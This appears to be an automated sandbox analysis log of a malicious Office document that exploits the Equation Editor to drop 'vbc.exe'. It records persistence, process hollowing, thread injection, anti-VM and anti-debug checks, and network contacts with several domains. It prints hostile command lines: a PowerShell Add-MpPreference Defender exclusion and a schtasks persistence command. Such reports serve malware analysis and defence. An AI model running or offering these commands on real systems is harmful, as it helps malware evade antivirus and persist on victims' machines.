Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0009B83B push eax; ret 12_2_0009B8A2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0009B832 push eax; ret 12_2_0009B838
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0009B89C push eax; ret 12_2_0009B8A2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00086907 push 00000060h; retf 12_2_0008691C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00099E43 push 0000007Eh; iretd 12_2_00099E45
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0008EFC6 push cs; ret 12_2_0008EFCC
Source: initial sample Static PE information: section name: .text entropy: 7.85477133341
Source: initial sample Static PE information: section name: .text entropy: 7.85477133341
Source: initial sample Static PE information: section name: .text entropy: 7.85477133341

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Roaming\nLOlOTZpUHFzC.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nLOlOTZpUHFzC" /XML "C:\Users\user\AppData\Local\Temp\tmp5580.tmp
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 4.2.vbc.exe.228f148.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.22fc90c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.463350952.000000000223F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.463429228.00000000022CD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2224, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000004.00000002.463350952.000000000223F000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.463429228.00000000022CD000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.463350952.000000000223F000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.463429228.00000000022CD000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 0000000000088604 second address: 000000000008860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 000000000008899E second address: 00000000000889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2788 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 760 Thread sleep time: -8301034833169293s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 760 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 760 Thread sleep time: -450000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2520 Thread sleep count: 4470 > 30 Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2520 Thread sleep count: 348 > 30 Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1940 Thread sleep time: -37113s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 772 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2520 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2080 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 1496 Thread sleep time: -34000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 240000 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\Public\vbc.exe Window / User API: threadDelayed 4470 Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 9_2_004088D0 rdtsc 9_2_004088D0
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 240000 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 37113 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: vbc.exe, 00000004.00000002.463429228.00000000022CD000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 0000000A.00000000.466037172.0000000000255000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.484397253.000000000457A000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: vbc.exe, 00000004.00000002.463429228.00000000022CD000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.463429228.00000000022CD000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 0000000A.00000000.479423416.00000000083DA000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0s
Source: explorer.exe, 0000000A.00000000.484397253.000000000457A000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.469562916.000000000577D000.00000004.00000001.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 0000000A.00000000.506224485.00000000044E7000.00000004.00000001.sdmp Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
Source: explorer.exe, 0000000A.00000000.479423416.00000000083DA000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000^
Source: explorer.exe, 0000000A.00000000.481002565.000000000029B000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 0000000A.00000000.470628485.00000000045D6000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.484397253.000000000457A000.00000004.00000001.sdmp Binary or memory string: idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________
Source: vbc.exe, 00000004.00000002.463429228.00000000022CD000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C626F8 mov eax, dword ptr fs:[00000030h] 9_2_00C626F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A426F8 mov eax, dword ptr fs:[00000030h] 12_2_00A426F8
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 9_2_004088D0 rdtsc 9_2_004088D0
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process token adjusted: Debug Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 9_2_00409B40 LdrLoadDll, 9_2_00409B40
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.digipoint-entertainment.com
Source: C:\Windows\explorer.exe Domain query: www.hacticum.com
Source: C:\Windows\explorer.exe Network Connect: 108.167.189.66 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 192.0.78.25 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.trashwasher.com
Source: C:\Windows\explorer.exe Domain query: www.noyoucantridemyonewheel.com
Source: C:\Windows\explorer.exe Domain query: www.franquiciasexclusivas.tienda
Source: C:\Windows\explorer.exe Network Connect: 151.106.119.46 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.deboraverdian.com
Source: C:\Windows\explorer.exe Network Connect: 151.101.66.159 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Adds a directory exclusion to Windows Defender
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nLOlOTZpUHFzC.exe
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nLOlOTZpUHFzC.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: A00000 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1764 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread register set: target process: 1764 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nLOlOTZpUHFzC.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nLOlOTZpUHFzC" /XML "C:\Users\user\AppData\Local\Temp\tmp5580.tmp Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: explorer.exe, 0000000A.00000000.499985867.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.474384817.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.466242782.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.481212963.0000000000750000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000000.474173559.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.499784480.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.466037172.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG
Source: explorer.exe, 0000000A.00000000.499985867.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.474384817.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.466242782.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.481212963.0000000000750000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 0000000A.00000000.499985867.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.474384817.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.466242782.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.481212963.0000000000750000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
